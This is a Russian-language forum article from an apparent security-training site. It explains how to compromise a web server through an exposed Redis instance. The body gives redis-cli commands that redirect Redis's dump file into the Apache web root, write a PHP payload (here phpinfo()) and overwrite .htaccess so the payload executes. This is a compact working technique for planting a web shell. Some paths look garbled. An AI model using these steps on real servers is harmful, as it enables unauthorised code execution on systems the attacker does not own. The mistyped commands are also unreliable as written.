• 🚨 29 мая стартует курс «Пентест Active Directory: от теории к практике» от Академии Кодебай

    🔍 Изучите реальные техники атак на инфраструктуру Active Directory: от первоначального доступа до полной компрометации.
    🛠️ Освойте инструменты, такие как BloodHound, Mimikatz, CrackMapExec и другие.
    🧪 Пройдите практические лабораторные работы, имитирующие реальные сценарии атак.
    🧠 Получите знания, которые помогут вам стать востребованным специалистом в области информационной безопасности.

    После старта курса запись открыта еще 10 дней Подробнее о курсе ...

  • Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

Статья Хекаем сайтики через Redis

Как жизнь, Амигос?! Пока пилю мега статью про мимикатц, решил подкинуть Вам немного не мало, инфу о том как можно хекнуть сервер с помощью одного только Redis'a и Apache.
Поехали.

Для того, чтобы похекать сервак с помощью открытой редиски, нужно сделать всего чуть - чуть действий:
Сначала воспользуемся скриптом redis-cli для удобно управления редиской.
Код:
redis-cli -h 127.0.0.1 -p 6379
upload_2017-3-29_14-18-3.png


После этого последовательно вводим следующие команды:
Код:
config set dir /var/www/htodcs
config set dbfilename /var/www/html/htdocs
flushall
set c "<?php phpinfo(); ?>"
save

Так как в директории присутствует .htaccess файл, то его можно перезаписать и выполнить php сценарий

upload_2017-3-29_14-19-27.png


Видосик:
 

Вложения

  • upload_2017-3-29_13-38-48.png
    upload_2017-3-29_13-38-48.png
    11,3 КБ · Просмотры: 570
  • upload_2017-3-29_14-18-24.png
    upload_2017-3-29_14-18-24.png
    14,1 КБ · Просмотры: 489
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Курс AD